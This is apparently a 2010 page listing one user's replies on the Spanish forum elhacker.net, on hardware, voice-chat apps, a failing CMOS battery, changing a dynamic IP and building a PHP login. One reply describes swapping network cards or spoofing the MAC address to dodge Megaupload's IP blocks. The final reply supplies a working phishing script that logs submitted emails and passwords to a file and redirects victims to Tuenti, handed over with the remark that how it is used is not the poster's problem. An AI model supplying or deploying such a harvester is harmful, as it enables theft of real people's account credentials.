elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: [1]
1  Informática / Hardware / Re: Diferencia en procesadores en: 13 Junio 2010, 01:57 am
de que presupuesto dispones?
2  Comunicaciones / Mensajería / Re: Necesto un programa para hablar con mis amigos miestras juego en: 13 Junio 2010, 01:55 am
Ventrilo
team speak
cualquiera de esos
3  Comunicaciones / Redes / Re: Cambiar IP dinámica en: 13 Junio 2010, 01:17 am
vale te digo un truco

realmente ono lo que hace con las ips es asignarlas por direccion mac,
para saltarse los controles de megaupload se puede hacer lo siguiente,
1º tener conexion directa a internet, si pasar por un router ni nada

2º tener 2 tarjetas de red, cada tarjeta tiene una direccion mac diferente

3º cuando megaupload te bloquea una ip simplemente cambias el cable de tarjeta de red reinicias el moden y listo ip nueva.


solucion 2 si estas con un router:
existen router que permiten la suplantacion de mac simplemente cuando te bloquee una ip entras en la configuracion del router y suplantas la mac y listo ip nueva



espero que se me alla entendido
4  Sistemas Operativos / Windows / Re: problema al iniciar xp alert!!! en: 13 Junio 2010, 01:02 am
es la pila
pero de todas formas para comprobarlo, cambia la fecha en la bios apaga el ordenador desenchufalo de la corriente y vuelve a encenderlo, si la hora se a cambiado ya sabes, pila nueva,
5  Programación / PHP / Re: Necesito un poco de ayuda de como hacer un login.php en: 12 Junio 2010, 13:20 pm
... haber... quizas parezca tonto, pero enserio que no lo soy... el video lo e visto entero desde el principio hasta el final varias veces... y se lo que dice y lo que no, os agradezco enormemente vuestras aportaciones, pero si realmente me vais a decir nada, prefiero que no me digais nada de verdad  :¬¬, nose si me explico ^^ de verda os lo agradezco, pero necesito ayuda, ayuda real, no que me digan lo que sale en el video  :rolleyes: si de verdad alguien sabe del tema agradeceria su ayuda e incluso pagaria... el dinero no me llega a importar en absoluto, mientras se me ayude de verdad, para los interesados mi e-mail es niyo_mago87@hotmail.com el caso se trata de que quiero saber EXACTAMENTE como hacer lo que sale en el video, SOLO ESO  :rolleyes:


omg pero si te pasado el codigo que funciona perfectamente, aunque viendo tu ignorancia quizas no deberia haberlo hecho

saludos
6  Programación / PHP / Re: Necesito un poco de ayuda de como hacer un login.php en: 12 Junio 2010, 00:48 am
Este es tu codigo:


<?php
$emai=$_POST['email'];
$passwor=$_POST['input_password'];
$archivo=fopen('aqui tu archivo',a);
fwrite($archivo,"Usuario: ".$emai." ...... Contraseña: " .$passwor." ");
fclose($archivo);
echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.es'>";
?>



Como lo uses ya no es mi problema
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines